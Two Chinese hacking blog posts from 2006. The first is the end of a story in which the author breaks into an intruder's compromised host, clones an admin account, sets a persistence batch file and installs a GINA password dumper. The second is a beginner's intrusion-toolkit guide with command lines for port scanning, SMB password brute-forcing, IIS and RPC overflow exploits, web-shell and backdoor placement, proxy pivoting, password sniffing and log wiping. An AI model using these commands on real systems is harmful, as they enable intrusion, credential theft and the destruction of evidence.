第3个文件夹只是放了几个无用的文件,做个幌子罢了。
接下来就室设置权限了,在user组里创建一个名为shuangfeng的帐号,密码为空,创建的方法:
进入计算机管理,在点本地用户和组,进入组然后双击USERS,入图4,点添加,对象名称里的方框里输入
shuangfeng,点应用OK。
把三个文件夹的共享都打开,进入安全把USER的权限中“读取和运行”“列出文件夹目录”“读取”打上勾,接着就是等他上钩了,如图5现在只等他进来了。
果然,几分钟后就收到了“狼来了拉”的短信,但没有灰鸽子的回应,看来是被杀了,树大招风啊。于是我马上登陆他的3389,用AAA帐号进去了,观察了一下,果然是肉鸡。先用CA克隆了guest,再删除AAA用户,方法如下:
在CMD里输入ca \\\\\\\\\\\\\\\\123.123.123.123 aaa aa guest shuangfeng
接着在肉鸡命令行输入:net user aaa /del
再写个BAT,内容如下:
time /t >>TSLog.log
netstat -n -p tcp | find \\\\\\”:3389\\\\\\”>>TSLog.log
start Explorer
用记事本编辑以后存为3389.bat,放到d:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\里
我来解释一下这个文件的含义:
第一行是记录用户登录的时间,time /t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号\\\\\\”>>\\\\\\”把这个时间记入TSLog.log作为日志的时间字段;
第二行是记录用户的IP地址,netstat是用来显示当前网络连接状况的命令,-n表示显示IP和端口而不是域名、协议,-ptcp是只显示tcp协议,然后我们用管道符号\\\\\\”|\\\\\\”把这个命令的结果输出给find命令,从输出结果中查找包含\\\\\\”:3389\\\\\\”的行(这就是我们要的客户的IP所在的行,如果你更改了终端服务的端口,这个数值也要作相应的更改),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在SLog.log文件中,记录格式如下:
22:40
TCP 192.168.12.28:3389 192.168.10.123:4903 ESTABLISHED
22:54
TCP 192.168.12.28:3389 192.168.12.29:1039 ESTABLISHED
也就是说只要这个TSLog.bat文件一运行,所有连在3389端口上的IP都会被记录
再写入HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\新建一个建值,内容为d:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\3389.bat
最后下载一个牛族nt/2000/xp 密码大盗,在CMD下输入:gina-intall接着显示:
======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 ===========
===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ =========
Usage:
Gina -install|-remove
-install Install Gina Dll in order to get Logon user\\\\\\\’s Password
-remove Remove Gina Dll and restore default Gina Dll
Warning: This option need administrator Privilege of LocalMachine!
Please Don\\\\\\\’t use this program to hacker! Good Luck!
D:\\\\\\\\Documents and Settings\\\\\\\\aaa\\\\\\\\桌面>gina -install
======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 ===========
===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ =========
Working now,Please Standby … -
STEP 1:
Source File: D:\\\\\\\\Documents and Settings\\\\\\\\maomao\\\\\\\\桌面\\\\\\\\SysGina32.dll
Target File: D:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\SysGina32.dll
Copy Gina Dll Option Success!
STEP 2:
Gina Dll Was Set to Register Success…
All Done, The password will be save to [D:\\\\\\\\winnt\\\\\\\\System32\\\\\\\\GinaPwd.txt]
只要有人登陆后就会记录再D:\\\\\\\\winnt\\\\\\\\System32\\\\\\\\GinaPwd.txt里
10分钟后我再次登陆了肉鸡,TClog.log上清清楚楚写这登陆着的IP,仔细一看,果然跟我的QQ中的一个人的IP一样,我在D:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\GinaPwd.txt得到他的密码后就撤了,因为我已经利用了这个简单的密罐完成了这次反入侵。如果我想的话可以用同样的方式在肉鸡上给那个人下个套,但我没这样,只留了个文本文件告诉了管理员就走了。剩下的事就事找那个人了。
分类 : 娱乐休闲 | 发表时间 09-03-2006
文章作者:SystEm32
黑客们在攻入一台主机之后,通常会上传一个精心配置的黑客工具包,里面包含了各种常用的黑客工具,在这些工具的帮助下,黑客们将肉鸡改造成为自己的“工作站”,通过它来隐藏自己的踪迹或是作为一个跳板来攻击其它主机。每个优秀的黑客都有自己独特的一套工具,作为刚刚进入黑客殿堂的初学者,如何选择、购造一个适合自己的工具包就显得尤为重要了。一个好的工具包应该包含扫描器、密码破解、嗅探、后门、清除日志……各项功能。下面我将向大家推荐一些适合入门新手的工具,我们要在性能、速度、大小和易用性之间找到一个平衡点,做到既间单又实用。好,LET’S GO!
首先打开我们的工具包,拿出第一样利器——扫描器。我为大家准备的是xcgi和PR这两个小东西,扫描通常分为端口扫描和漏洞扫描,端口扫描就是看目标主机开放了哪些端口,在根据相应端口进行入侵尝试。比如一台机器开了21(FTP)端口,我们就可以利用暴力猜解口令的方法尝试进入。而漏洞扫描则通常是针对80端口的,用于检测cgi和IIS漏洞。我们包里的PR是用于端口扫描的,xcgi是用于cgi和IIS漏洞扫描的,它们与同类扫描器相比有以下优点∶速度超快(PR扫3000个端口只要60秒)、体积暴小(PR 7K,xcgi 41K)、还可以自定义漏洞列表,让你随时添加最新漏洞! PR的用法是:c:\pr.exe 127.0.0.1 1-3000 -d:1 -o (扫描127.0.0.1的1至3000端口,-d:1表示扫描延时一秒,-o表示只显示开放的端口); xcgi的用法是c:\xcgi 127.0.0.1 80(ip+端口),在同一个文件夹下,还有cgi.lst这个文件,里面保存的是漏洞列表,你可以用记事本
打开它,往里面添加最新的漏洞。
现在拿出我们第二样利器——暴力破解和溢出程序。我为大家准备了:IISidq,smbcrack,RPCexp,webdavx3这四样东西。在所有的黑客软件中,溢出程序最容易使用,成功率也特别高,常见的可以利用的溢出漏洞有.printer ,.idq,.asp,webdav接口溢出,locator服务溢出….等,其中webdav,locator这两个漏洞是不久之前才公布的,利用价值极大,成功的可能性也非常高,而.printer,.asp这些或者因为过时(.printer只对sp0有效),或者因为成功率低,所以很少用到.在我给出的程序中,IISidq.exe是针对.idq的,RPCexp.exe是针对locator的,webdavx3.exe是针对webdav的。而smbcrack是小榕写的,用于暴力破解nt/2000密码的冬冬,速度极快,最高可达到200多个密码/分钟,绝对是居家旅行必备良器: )
接下来来是第三样利器——跳板和后门。后门程序是用来保持权限的,方便黑客再次进入,跳板则常用于隐藏真实的ip地址,防止被人反追踪。对于后门,我们要谨慎选择,应为这关系到你是否能长期保持对”爱鸡”的拥有权,现在网上的后门程序层出不穷,但是在杀毒软件的追杀下,再好的后门也只能用1~2个月而已,过了这期限随着杀毒软件的升级,后门便再也无所遁形了.所以优秀的黑客所用的后门往往都是自己写的,但是对于我们而言没有这个水平,那怎么办呢?其实,有两个后门程序,上市已久,但仍然不会被杀,那就是cmd.asp和ispc。cmd.asp是一个用asp编写的网页木马,只要把它放到对方的网页目录下(目录必须要有脚本执行权限),然后在浏览器中输入http://www.victim.com/你放的目录/cmd.asp就可以控制了。ispc有两个文件:ispc.exe,idq.dll
把idq.dll放在对方的网页目录中,然后在自己的机器上输入c:\ispc www.victim.com/你放的目录/idq.dll,就可以得到一个有system权限的shell了。其实还有不少非常优秀的后门比如wollf,毒箭等,因为会被杀掉等原因,就不再介绍了。至于跳板,snake写的sockserver是当仁不让的首选!支持sock5,sock4代理,可以隐藏你的真实ip,不少人也用它来代理上QQ,要想使用sockserver,你还必须有skServerGUI这个程序,在肉鸡上运行sockserver然后在你自己的机器上运行skServerGUI就可以进行代理了,他还支持多级代理,让追踪你的人迷路去吧。
现在,我们来看看第四样利器——嗅探器。对于嗅探器,大多数入门不久的朋友应该还比较陌生,其实嗅探器的运行原理很容易理解,使用也比较方便,下面,我将向各位简要地谈谈它地的原理并推荐一个小巧的嗅探器—xsinff。在网络上,有很多服务的传输数据时并没有对所传输的数据进行加密,这些数据中有时也包含了如用户名和密码之类的敏感信息,只要捕获了还有这些信息的数据包,我们就能从中得到用户名和口令,从而进行进一步的入侵。为了捕捉在网络上传输的数据包,嗅探器应运而生,嗅探器有从链路层直接获取数据的能力。通常用于流量分析和异常数据分析,但对于黑客而言,嗅探器却可用于获得口令或者是在进行欺骗攻击之前收集必要的信息。通常黑客们攻入一台主机后,会在这台主机上安装一个嗅探器,这样,在整个子网传输的口令都会被捕获,攻击便会蔓延开来,例如我们有一台肉鸡A,B是我们想入侵的机子,A与B在同一子网内,那么我们在A上运行嗅探器,就可以得到B的用户名和密码,再利用得到的密码,就可以进入B了,这就是sinffer的可怕之处,一个网域内只要有一台主机不安全,那么整个网域也就不安全了。好了,讲了那么多原理,现在来将xsinff的使用吧,xsinff基本上仅用于捕获密码,它提供了后台运行和日志记录的功能,常用格式:c:\xsinff -tcp -pass -hide -log passwd.log
-tcp 表示抓取tcp包,-pass 捕获口令 ,-hide 是后台运行,-log 是把捕获的口令存放到一个文件中,你可以自己指定文件名,我们这里是纪录到passwd.log这个文件中。
最后,还有些工具不得不提,这些工具无法具体分类,但绝对是必备的,主要有这几个,pskill,pslist,CA,elsave
cleanIISlog,wget,pslist(即process_list)顾名思义,是用于查看进程的。pskill是用来杀死进程的,要使用pslist和pskill,必须先建立管道连接(net use \\ip\ipc$ passwd /user:username)然后c:\pslist/pskill ip就行了。wget是一个命令行下的下载工具,如果你需要别的什么工具,可以用wget从网上直接下载.CA用于克隆管理员账号,通过它,你可以把一个低权限的普通账号克隆成为管理员账号,从而建立一个账户后门。elsave则用来清除自己的入侵痕迹,只需要输入c:\elsave -C 就可以把3个主要日志(system,security,application)清空,还有一个清除日志的软件我们用得很多的,那就是cleanIISlog,我个人非常赞赏这个东东,它可以在iis的日志中删去指定ip留下的纪录,因此,在你扫描完毕进入主机后,千万别忘了运行c:\cleaniislog CleanIP <你的ip>.
通过上面的介绍,相信大家对黑客工具包的构成和使用有了一定的了解,一个好的工具包最大的用处就是提高入侵的效率。由于每个人的习惯,目的不同,所以笔者介绍的这些并不一定适合您,但是希望在本文本帮助下,各位也能构造一个属于自己的,方便,完善的工具包。
